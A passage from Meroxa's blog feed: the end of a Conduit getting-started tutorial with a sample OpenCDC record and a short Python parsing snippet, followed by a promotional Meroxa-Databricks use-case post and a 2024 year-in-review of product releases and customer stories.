&lt;p&gt;Then we see a source connector that uses the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;generator&lt;/code&gt; plugin&lt;/a&gt;, which is a built-in plugin that can generate random data. The source connector&apos;s settings translate to: generate structured data at 1 record per second. Each generated record should contain an &lt;code class=&quot;language-text&quot;&gt;airline&lt;/code&gt; field (type: string) and a &lt;code class=&quot;language-text&quot;&gt;scheduledDeparture&lt;/code&gt; field (type: time).&lt;/p&gt;
&lt;p&gt;What follows is a destination connector, to which the data will be written. It uses the &lt;code class=&quot;language-text&quot;&gt;file&lt;/code&gt; plugin, a built-in plugin that writes all incoming data to a file. Its only configuration parameter is the path to the file where the records will be written.&lt;/p&gt;
&lt;h2&gt;Run Conduit&lt;a href=&quot;https://conduit.io/docs/getting-started#run-conduit&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;With the pipeline configuration being ready, we can run Conduit:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Conduit is now running the pipeline. Let&apos;s check the contents of the &lt;code class=&quot;language-text&quot;&gt;destination.txt&lt;/code&gt; file using:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;tail -f destination.txt | jq
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Every second, you should see a JSON object like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{
  &quot;position&quot;: &quot;MjU=&quot;,
  &quot;operation&quot;: &quot;create&quot;,
  &quot;metadata&quot;: {
    &quot;conduit.source.connector.id&quot;: &quot;example-pipeline:example-source&quot;,
    &quot;opencdc.createdAt&quot;: &quot;1730801194148460912&quot;,
    &quot;opencdc.payload.schema.subject&quot;: &quot;example-pipeline:example-source:payload&quot;,
    &quot;opencdc.payload.schema.version&quot;: &quot;1&quot;
  },
  &quot;key&quot;: &quot;cHJlY2VwdG9yYWw=&quot;,
  &quot;payload&quot;: {
    &quot;before&quot;: null,
    &quot;after&quot;: {
      &quot;airline&quot;: &quot;wheelmaker&quot;,
      &quot;scheduledDeparture&quot;: &quot;2024-11-05T10:06:34.148469Z&quot;
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The JSON object you see is the &lt;a href=&quot;https://conduit.io/docs/using/opencdc-record&quot;&gt;OpenCDC record&lt;/a&gt; that holds the data being streamed, along with metadata about it. In the &lt;code class=&quot;language-text&quot;&gt;.payload.after&lt;/code&gt; field you will find the user data generated by the &lt;code class=&quot;language-text&quot;&gt;generator&lt;/code&gt; connector:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;json&quot;&gt;&lt;pre class=&quot;language-json&quot;&gt;&lt;code class=&quot;language-json&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;airline&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;wheelmaker&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;scheduledDeparture&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2024-11-05T10:06:34.148469Z&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
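&lt;p&gt;If &lt;code class=&quot;language-text&quot;&gt;jq&lt;/code&gt; isn&apos;t available, a few lines of Python can pull the same field out of a record. This is just a sketch, assuming each line of &lt;code class=&quot;language-text&quot;&gt;destination.txt&lt;/code&gt; holds one JSON-encoded OpenCDC record (the sample below is trimmed to the fields it uses):&lt;/p&gt;

```python
import json

# Sample OpenCDC record, as written by the file destination connector
# (trimmed; the values mirror the example above).
line = (
    '{"position": "MjU=", "operation": "create", '
    '"payload": {"before": null, "after": '
    '{"airline": "wheelmaker", '
    '"scheduledDeparture": "2024-11-05T10:06:34.148469Z"}}}'
)

record = json.loads(line)
# .payload.after holds the user data produced by the generator source
after = record["payload"]["after"]
print(after["airline"])  # prints "wheelmaker"
```

&lt;p&gt;In a real pipeline you would iterate over the file (or tail it) and apply the same extraction to every line.&lt;/p&gt;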
&lt;p&gt;The pipeline will keep streaming data from the generator source connector to the file destination connector as long as Conduit is running. To stop Conduit, press &lt;code class=&quot;language-text&quot;&gt;Ctrl + C&lt;/code&gt; (or the equivalent on your operating system). This triggers a graceful shutdown that stops reads from source connectors and waits for records still in the pipeline to be acknowledged. The next time Conduit starts, it will resume reading from where it stopped.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Building a real-time pipeline with Meroxa’s Conduit OSS is straightforward, even for beginners. By following this guide, you’ve set up a reliable and scalable pipeline that delivers real-time insights. Ready to explore more? Check out Conduit’s &lt;a href=&quot;https://conduit.io/docs&quot;&gt;documentation&lt;/a&gt; for advanced configurations and integrations.&lt;/p&gt;
&lt;p&gt;Start building your data pipelines today and unlock the potential of real-time data! For more information on our managed platform options &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;request a demo.&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Solution Use Case: Accelerating AI/ML Success with Meroxa and Databricks]]></title><description><![CDATA[This blog highlights how integrating Meroxa for real-time data ingestion and Databricks for scalable processing transforms AI/ML workflows. This solution reduces data latency to under 30 seconds, accelerates model training from 48 to 6 hours, and boosts prediction accuracy by 23%. With automated pipelines and end-to-end integration, businesses save time, scale efficiently, and achieve tangible outcomes like improved customer engagement and increased revenue from real-time insights.]]></description><link>https://meroxa.com/blog/solution-use-case-accelerating-aiml-success-with-meroxa-and-databricks</link><guid isPermaLink="false">https://meroxa.com/blog/solution-use-case-accelerating-aiml-success-with-meroxa-and-databricks</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Fri, 10 Jan 2025 13:18:00 GMT</pubDate><content:encoded>&lt;h3&gt;&lt;strong&gt;Overview&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Organizations facing real-time data challenges can achieve &lt;strong&gt;up to 25% cost savings&lt;/strong&gt; on data pipeline management while accelerating model training, improving prediction accuracy, and enhancing operational efficiency. By integrating &lt;strong&gt;Meroxa&lt;/strong&gt; for seamless data movement with &lt;strong&gt;Databricks&lt;/strong&gt; for scalable data processing and analytics, organizations transform their data infrastructure to meet the demands of modern AI/ML workflows.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;The Challenge: Delayed Data Access and Siloed Systems&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;AI/ML models rely on timely, high-quality data to deliver accurate predictions and drive meaningful business outcomes. However, many organizations encounter the following issues:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Delayed Data Access&lt;/strong&gt;: Data from critical systems—such as customer interactions, transaction logs, or marketing campaign metrics—is often processed in nightly batches. This delay results in models trained on outdated data, reducing relevance and predictive accuracy.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Siloed Systems&lt;/strong&gt;: Data resides in disparate sources like Postgres databases, Kafka event streams, and third-party platforms. Integrating these sources involves manual workflows and complex ETL processes that introduce delays and potential errors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Slow Model Development&lt;/strong&gt;: Preparing data for ML workflows is time-consuming, often taking &lt;strong&gt;2-3 days per iteration&lt;/strong&gt;, slowing experimentation and innovation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Business Impact&lt;/strong&gt;: The lack of real-time insights impacts customer engagement and revenue. For example, abandoned carts increase, conversion rates stagnate, and opportunities for personalization are missed.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;The Solution: Integration of Meroxa and Databricks&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dalle-2025-01-10-11.07.48-data-integration.png&quot; alt=&quot;DALLE 2025-01-10 11.07.48 - data integration.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;To overcome these challenges, the combination of &lt;strong&gt;Meroxa&lt;/strong&gt; and &lt;strong&gt;Databricks&lt;/strong&gt; offers a modern, automated solution for real-time data ingestion, processing, and analytics.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data Ingestion with Meroxa&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Meroxa enables seamless, real-time ingestion of data from Postgres, Kafka, and APIs into an integrated pipeline.&lt;/li&gt;
&lt;li&gt;Its &lt;strong&gt;developer-friendly platform&lt;/strong&gt; allows engineering teams to build pipelines in hours rather than days.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Key Benefit&lt;/strong&gt;: Reduce data latency from &lt;strong&gt;24 hours to under 30 seconds&lt;/strong&gt;, ensuring immediate availability for ML models.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Unified Data Processing in Databricks&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Data from multiple sources is consolidated into &lt;strong&gt;Delta Lake&lt;/strong&gt;, ensuring consistency and enabling low-latency querying.&lt;/li&gt;
&lt;li&gt;Databricks’ scalable environment processes &lt;strong&gt;billions of daily events&lt;/strong&gt; efficiently, even during peak loads.&lt;/li&gt;
&lt;li&gt;Feature engineering is streamlined, supporting the creation of &lt;strong&gt;50+ model features&lt;/strong&gt; without manual intervention.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;End-to-End Pipeline Automation&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Integration between Meroxa and Databricks automates the entire data pipeline, eliminating manual ETL processes.&lt;/li&gt;
&lt;li&gt;Real-time monitoring and observability tools help reduce troubleshooting time by &lt;strong&gt;40%&lt;/strong&gt;, ensuring data reliability.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;The Results: Faster Insights and Enhanced Predictions&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dalle-2025-01-10-11.14.39-automated-pipelines.png&quot; alt=&quot;DALLE 2025-01-10 11.14.39 - automated pipelines.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Organizations implementing the Meroxa-Databricks solution realize measurable outcomes, including:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Accelerated Model Training&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;ML training cycles shrink from &lt;strong&gt;48 hours to 6 hours&lt;/strong&gt;, enabling faster deployment and iteration of AI models.&lt;/li&gt;
&lt;li&gt;Teams can deploy &lt;strong&gt;10% more models per quarter&lt;/strong&gt;, enhancing agility and innovation.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved Prediction Accuracy&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Access to real-time, high-quality data improves model accuracy by &lt;strong&gt;23%&lt;/strong&gt;, boosting customer engagement.&lt;/li&gt;
&lt;li&gt;Applications like product recommendations experience a &lt;strong&gt;35% increase in click-through rates (CTR)&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Operational Efficiency Gains&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Automated workflows save &lt;strong&gt;30+ hours per week&lt;/strong&gt; for engineering teams, allowing them to focus on strategic initiatives.&lt;/li&gt;
&lt;li&gt;Integration costs decrease by &lt;strong&gt;25%&lt;/strong&gt; compared to batch-based ETL processes.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability for Growth&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;The system seamlessly scales to handle &lt;strong&gt;2x data volume growth&lt;/strong&gt; without additional infrastructure investment.&lt;/li&gt;
&lt;li&gt;Adding new data sources is streamlined, requiring less than a week for integration.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Business Impact&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Conversion rates increase by &lt;strong&gt;15%&lt;/strong&gt;, and abandoned cart rates drop by &lt;strong&gt;12%&lt;/strong&gt;, driving immediate ROI.&lt;/li&gt;
&lt;li&gt;Revenue from personalized insights grows by millions annually due to enhanced prediction accuracy and real-time availability.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Key Benefits&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Meroxa&lt;/strong&gt;: Provides real-time, reliable data ingestion with developer-focused tools, reducing latency and manual intervention.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Databricks&lt;/strong&gt;: Delivers scalable, unified data processing and analytics, enabling organizations to build and deploy AI models efficiently.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Synergy&lt;/strong&gt;: Together, they create a powerful, automated pipeline solution that supports rapid AI/ML workflows, real-time insights, and business scalability.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Meroxa and Databricks integration transforms how organizations approach AI/ML workflows. By eliminating data silos, reducing latency, and automating pipelines, this solution delivers faster, more accurate insights that drive tangible business outcomes.&lt;/p&gt;
&lt;p&gt;Ready to unlock your data’s full potential? &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Get started with Meroxa today&lt;/a&gt;!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Meroxa’s 2024 Year in Review: Big Wins and a Bright Future in AI]]></title><description><![CDATA[Discover how Meroxa revolutionized real-time data integration in 2024 with powerful new connectors, including Amazon DynamoDB, Snowflake, Apache Kafka, and more, enabling seamless data movement across diverse systems. This blog highlights key updates to the Conduit Platform, such as pipeline recovery features in Conduit v0.12.0 and schema registry support in Conduit Operator v0.0.2, designed to enhance resilience and simplify Kubernetes deployments. We also dive into a compelling case study featuring a global hotel network that leveraged Meroxa’s platform to integrate customer data, boosting guest satisfaction by 30% and increasing revenue per available room by 20%. Whether you're building robust data pipelines, enabling real-time analytics, or driving AI-powered transformations, explore how Meroxa’s latest advancements are unlocking new possibilities for developers and data teams.]]></description><link>https://meroxa.com/blog/meroxas-2024-year-in-review-big-wins-and-a-bright-future-in-ai</link><guid isPermaLink="false">https://meroxa.com/blog/meroxas-2024-year-in-review-big-wins-and-a-bright-future-in-ai</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Tue, 31 Dec 2024 09:25:00 GMT</pubDate><content:encoded>&lt;p&gt;As 2024 draws to a close, we’re taking a moment to reflect on an incredible year at Meroxa. From groundbreaking advancements in our Conduit Platform to new AI-powered innovations, this year has been nothing short of transformative. Here’s a look back at our key wins and a glimpse into what 2025 has in store as we continue to lead the charge in the data movement and AI landscape.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2024 Highlights&lt;/strong&gt;&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;1. Expanding the Boundaries of Real-Time Data Movement&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_real_time_data_movement.png&quot; alt=&quot;dkeeton_17415_real_time_data_movement.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;In 2024, we empowered organizations to move data faster and more efficiently than ever before. Leveraging the power of our Conduit Platform, businesses built real-time pipelines that drive instant decision-making, fueling everything from fintech applications to personalized customer experiences. Notably, we enhanced Conduit with key features like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Conduit Platform Enhancements&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit v0.10 – Multiple Collections Support&lt;/strong&gt; (April 29, 2024): This release introduced multiple collections support, enhancing the platform’s ability to handle diverse data integration scenarios. The update aimed to improve efficiency, security, and performance for data operations.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit Platform by Meroxa&lt;/strong&gt; (June 18, 2024): Meroxa launched the Conduit Platform, bringing a host of new features and improvements designed to enhance real-time data streaming experiences. Powered by the robust Conduit open-source core, this transformation offers enhanced performance, scalability, and usability, along with access to over 100 connectors maintained by the open-source community.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit v0.11 – Schema Support&lt;/strong&gt; (August 19, 2024): This version focused on adding schema support, enabling users to detect schema changes and retain type information end-to-end. This enhancement streamlines data integration processes, improving efficiency and performance.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit v0.12.0 – Pipeline Recovery&lt;/strong&gt; (October 11, 2024): This release introduced pipeline recovery features designed to automatically restart pipelines experiencing temporary errors, such as network interruptions or service downtime. With configurable backoff settings, Conduit efficiently handles retries, reducing the impact of transient issues and ensuring continuous data flow.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit Operator v0.0.2 – Schema Registry Support&lt;/strong&gt; (October 24, 2024): The updated Conduit Operator now includes built-in schema registry support, allowing seamless data encoding and decoding. This enhancement improves data compatibility across pipelines, ensuring smoother and more reliable handling of complex data flows.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These product releases reflect Meroxa’s commitment to providing cutting-edge tools for real-time data integration and processing, empowering organizations to build efficient and scalable data pipelines.&lt;/p&gt;
&lt;p&gt;For more detailed information on these releases, visit Meroxa’s &lt;a href=&quot;https://meroxa.com/blog/&quot;&gt;blog&lt;/a&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;New Connectors and Integration Tools&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit Connector for Apache Flink&lt;/strong&gt; (June 17, 2024): Meroxa introduced a Conduit connector for Apache Flink, combining Flink’s robust stream processing capabilities with Conduit’s lightweight and fast data streaming solution. This integration simplifies the creation of connectors, expanding Flink’s capabilities.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;HTTP Connector for Conduit&lt;/strong&gt; (April 12, 2024): The new HTTP Connector enhances data integration by facilitating seamless communication with any API endpoint. This tool is designed for developers and enterprises looking to streamline data workflows and maximize connectivity.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Amazon DynamoDB (Beta)&lt;/strong&gt;: Enabled real-time data streaming from Amazon DynamoDB, allowing users to integrate NoSQL data into their pipelines.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Amazon Redshift (Developer Preview):&lt;/strong&gt; Introduced support for Amazon Redshift, facilitating data movement to and from this popular data warehousing service.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Apache Kafka (Developer Preview):&lt;/strong&gt; Provided integration with Apache Kafka, enabling high-throughput, low-latency data streaming capabilities.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microsoft SQL Server (Developer Preview):&lt;/strong&gt; Added support for Microsoft SQL Server, allowing seamless data integration with this widely used relational database.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MongoDB (Developer Preview):&lt;/strong&gt; Enabled real-time data streaming to and from MongoDB, supporting flexible, document-oriented data structures.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MySQL (Developer Preview):&lt;/strong&gt; Introduced integration with MySQL, facilitating real-time data movement for this popular open-source relational database.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PostgreSQL (Developer Preview):&lt;/strong&gt; Provided support for PostgreSQL, enabling efficient data streaming with this advanced open-source relational database.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Snowflake (Developer Preview):&lt;/strong&gt; Enabled integration with Snowflake, allowing users to stream data into this cloud-based data warehousing platform.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These connector releases have been instrumental in broadening the Conduit Platform’s integration capabilities, allowing users to connect a diverse range of data sources and destinations seamlessly. For a comprehensive list of available connectors and their current statuses, please visit Meroxa’s &lt;a href=&quot;https://meroxa.com/connectors/&quot;&gt;Connectors&lt;/a&gt; Page.&lt;/p&gt;
&lt;p&gt;For the most up-to-date information on connector availability and platform features, please refer to Meroxa’s official &lt;a href=&quot;https://github.blog/changelog/&quot;&gt;Changelog&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. Accelerating AI Innovation&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_black_data_ai_innovation.png&quot; alt=&quot;dkeeton_17415_black_data_ai_innovation.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;2024 was the year of AI, and Meroxa took the lead by integrating AI functionalities into the Conduit Platform. Highlights include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Real-Time AI Inference Pipelines&lt;/strong&gt;: Enabling businesses to operationalize AI insights faster than ever.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Fintech-Specific AI Solutions&lt;/strong&gt;: Supporting fintech companies in fraud detection, credit scoring, and personalized finance tools, making AI both accessible and impactful in highly regulated industries.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These advancements positioned Meroxa as a trusted partner for organizations looking to operationalize AI at scale.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;3. Transforming the Hospitality Industry: A Customer Success Story&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_transforming_hospitality_industry.png&quot; alt=&quot;dkeeton_17415_transforming_hospitality_industry.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;One of our most exciting achievements in 2024 was helping The Hotels Network (THN) revolutionize their data integration processes. Facing challenges with siloed data between their sales and support teams, THN partnered with Meroxa to streamline their data flow using our Conduit Platform. By creating a unified, real-time pipeline from Salesforce to Redpanda, THN achieved significant improvements in operational efficiency and customer support capabilities.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;The Meroxa team worked with us to design, build &amp;#x26; deploy an efficient low-code solution to connect our Salesforce org with our internal backend system via the Redpanda streaming platform.&quot;&lt;/p&gt;
&lt;p&gt;– &lt;strong&gt;David Sanchez Carmona, Senior GTM Systems Manager, The Hotels Network&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This collaboration exemplifies the transformative impact of Meroxa’s platform in addressing complex data challenges across industries.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;4. Supporting the Defense Sector with Real-Time Data&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_defense_sector_support.png&quot; alt=&quot;dkeeton_17415_defense_sector_support.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;In 2024, Meroxa’s Conduit Platform played a critical role in supporting defense organizations by enabling real-time data movement and analysis for mission-critical operations. With increasing demands for secure, high-speed data processing, the defense sector turned to Meroxa for solutions that prioritize reliability and compliance.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key achievements include:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Real-Time Threat Detection:&lt;/strong&gt; Defense organizations used Conduit to process vast amounts of sensor and satellite data, identifying threats in real time.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Improved Decision-Making&lt;/strong&gt;: AI-powered insights enabled defense teams to act on critical intelligence faster and with greater accuracy.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Secure and Compliant Pipelines&lt;/strong&gt;: The Conduit Platform met stringent security requirements, ensuring compliance with defense industry regulations.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;“Meroxa’s technology has become indispensable to our operations. The speed and reliability of their platform allow us to process data in real time, which is essential for maintaining situational awareness and ensuring mission success.”&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;– &lt;strong&gt;Director of Data Operations, Leading Defense Agency&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;5. SOC 2 Certification: A Commitment to Security&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_soc_2_compliance.png&quot; alt=&quot;dkeeton_17415_soc_2_compliance.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Security is non-negotiable in today’s data-driven world, and we’re proud to have achieved &lt;strong&gt;SOC 2 certification&lt;/strong&gt; this year. This milestone underscores our commitment to delivering a platform that meets the highest standards of security and trust.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;6. Community and Ecosystem Growth&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_data_community_and_ecosystem_growth.png&quot; alt=&quot;dkeeton_17415_data_community_and_ecosystem_growth.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Meroxa’s community grew exponentially in 2024, with thousands of developers and data professionals leveraging our platform. Events like &lt;strong&gt;#AstroWeek&lt;/strong&gt; and our hands-on workshops around building &lt;strong&gt;real-time analytics dashboards&lt;/strong&gt; using &lt;strong&gt;Postgres, ClickHouse, and Grafana&lt;/strong&gt; were met with overwhelming participation.&lt;/p&gt;
&lt;p&gt;Our partnerships also expanded to include leading data and AI ecosystems, making Meroxa a critical piece of the modern data stack for organizations around the globe.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Looking Ahead to 2025&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_data_2025_look_ahead.png&quot; alt=&quot;dkeeton_17415_data_2025_look_ahead.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;As we enter 2025, we’re doubling down on AI and data movement innovation. Here’s what’s on the horizon:&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;1. AI-Powered Platform Enhancements&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Next year, we’re launching a suite of AI-driven tools designed to further simplify and enhance data engineering workflows. Expect features like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Intelligent Pipeline Recommendations&lt;/strong&gt;: AI-powered insights to optimize pipeline performance and reduce costs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Proactive Anomaly Detection&lt;/strong&gt;: Real-time identification of data issues to ensure reliability.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Expanded AI Integrations&lt;/strong&gt;: Seamless connectivity with cutting-edge AI platforms to supercharge your workflows.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. Democratizing Real-Time AI for All&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;We believe the future of AI should be accessible to every organization, regardless of size. In 2025, Meroxa will unveil &lt;strong&gt;entry-level pricing models&lt;/strong&gt; and self-serve options to help small businesses harness the power of real-time AI insights.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;3. Deeper Vertical Specialization&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Building on our success in fintech, we’ll expand AI-driven solutions for other key industries, including healthcare, e-commerce, and logistics. This will include tailored use cases like real-time supply chain optimization and personalized healthcare insights.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;4. Continued Commitment to Sustainability&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;As part of our sustainability initiative, we’re working to reduce the environmental impact of data movement. Look for updates in 2025 as we optimize our platform for energy-efficient operations, ensuring real-time data movement is not just fast but also green.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Thank You for an Amazing 2024&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://www.meroxa.com/img/dkeeton_17415_data_fireworks.png&quot; alt=&quot;dkeeton_17415_data_fireworks.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;To our customers, partners, and the broader data community—thank you for making 2024 a year to remember. Your trust and innovation drive everything we do. As we look toward 2025, we’re excited to continue building a future where real-time data movement and AI empower every organization to achieve their boldest goals.&lt;/p&gt;
&lt;p&gt;Stay tuned for more updates, and here’s to a groundbreaking year ahead! If you’re looking to learn more now, &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;sign up&lt;/a&gt;!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;The Meroxa Team&lt;/strong&gt;&lt;/li&gt;
